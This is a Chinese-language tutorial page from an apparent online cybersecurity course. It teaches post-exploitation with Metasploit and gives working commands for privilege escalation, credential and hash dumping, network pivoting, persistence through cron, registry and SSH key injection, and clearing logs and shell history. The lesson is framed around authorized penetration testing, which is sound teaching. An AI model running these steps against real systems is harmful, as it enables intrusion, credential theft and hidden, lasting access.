Cyber Security Academy · 课时

后渗透:横向移动与持久化

使用 Metasploit 的后渗透模块进行权限提升、凭据转储和持久化。

第 4 / 4 课13 个步骤

后渗透:横向移动与持久化 是 CoddyKit 上的免费 Cyber Security Academy 课时。 这是第 4 节课,共 4 节。 你可以在下方免费阅读本课时的完整内容 — 然后在浏览器中使用内置代码编辑器和全天候 AI 导师进行实践。 这是 Cyber Security Academy 学习路径的一部分,你的进度在网页和 CoddyKit 应用中同步。 Cyber Security Academy 课程共包含 4 节课。

后渗透目标

获得初始访问权限后,攻击者的目标包括:提升权限、收集情报、维持持久访问,并横向移动以达到真正的目标(数据、系统或域控制权)。

态势感知

获得 Shell 后的第一步是了解自己所处的位置。收集系统信息、网络配置、当前用户权限、正在运行的进程以及环境变量。

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

权限提升

本地权限提升会将低权限 Shell 提升为 root/SYSTEM。Metasploit 的 local_exploit_suggester 会根据目标 OS 版本识别适用的内核漏洞利用程序和本地漏洞利用程序。

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

凭据收集

收集凭据:经过哈希处理的密码、配置文件中的明文凭据、浏览器保存的密码以及 SSH 密钥。这些信息可以用于横向移动和持久化访问。

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

网络枢纽:端口转发

网络枢纽利用已被攻陷的主机作为桥梁,访问隔离的内部网络。Metasploit 的 portfwd 可以通过 Meterpreter 会话创建本地端口转发。

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

通过会话进行路由

Metasploit 的 route 模块可以通过会话添加网络路由,使其他模块能够访问只能通过网络枢纽主机到达的网络。

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

SOCKS 代理网络枢纽

通过 Metasploit 使用 SOCKS 代理(或使用 chisel/ssh -D),可以借助 proxychains 将任意工具通过网络枢纽进行路由,从而让 nmap、curl 和浏览器访问内部网络。

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

持久化机制

持久化可确保访问权限在重启和会话丢失后仍然存在。常见方法包括:cron 任务(Linux)、注册表运行键(Windows)、注入 SSH authorized_keys 以及安装服务。

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

清除痕迹

攻击者会清除日志以保持隐蔽。安全提示:现代 SIEM 和 EDR 解决方案会实时将日志发送到主机外部;清除本地日志并不会删除集中式记录。

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

后渗透模块

Metasploit 为 Windows 和 Linux 提供数百个后渗透模块,涵盖凭据收集、浏览器数据、键盘记录、屏幕截图和网络枚举。

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

知道何时停止

在获得授权的渗透测试中,达到约定的范围目标,或遇到您无权访问的数据时,就应停止。请仔细记录您的路径——这就是您要在报告中说明的攻击链。

快速检查

Metasploit 的“route add”命令可以实现什么?

总结:后渗透

后渗透在初始访问的基础上实现真正的影响:权限提升、凭据收集、横向移动和持久化。Metasploit 为每个阶段都提供了后渗透模块。记录每一步——从进入点到目标的攻击链是渗透测试的核心交付成果。

免费开始

用 AI 导师学习 Cyber Security Academy — 免费

在浏览器中编写并运行真实代码,获得全天候 AI 导师的即时帮助,并在网页或应用中继续学习。

课程
76
课程
303

常见问题解答

「后渗透:横向移动与持久化」课时是免费的吗?

是的 — 「后渗透:横向移动与持久化」的完整文本可在网页上免费阅读。要进行交互式练习(内置代码编辑器和全天候 AI 导师)并解锁 Cyber Security Academy 课程的其余内容,请升级到 CoddyKit PRO。 Cyber Security Academy 课程共包含 4 节课。

「后渗透:横向移动与持久化」这节课中我会学到什么?

使用 Metasploit 的后渗透模块进行权限提升、凭据转储和持久化。 你通过在浏览器中直接运行的动手代码来练习 Cyber Security Academy,全天候 AI 导师会在你学习这节课的过程中回答你的问题。

学习 Cyber Security Academy 需要有经验吗?

无需任何先前经验。CoddyKit 上的 Cyber Security Academy 课程适合初学者到高级学习者,你可以从这里开始或从头开始,按照自己的节奏学习。 这是第 4 节课,共 4 节。

「后渗透:横向移动与持久化」课时需要多长时间?

大多数 CoddyKit 课程大约需要 5–10 分钟。每节课都很精短且互动,所以你能稳步进步,并在网页和应用中从离开的地方继续。

我能在这节 Cyber Security Academy 课中编写并运行代码吗?

能。每节 Cyber Security Academy 课都包含内置代码编辑器,你可以在浏览器中直接编写并运行真实代码,并获得即时 AI 反馈 — 无需本地设置。

此课程中的所有课时

  1. Metasploit 架构与 msfconsole
  2. 利用已知漏洞
  3. 有效载荷:分阶段与无阶段、Meterpreter
  4. 后渗透:横向移动与持久化
← 返回 Cyber Security Academy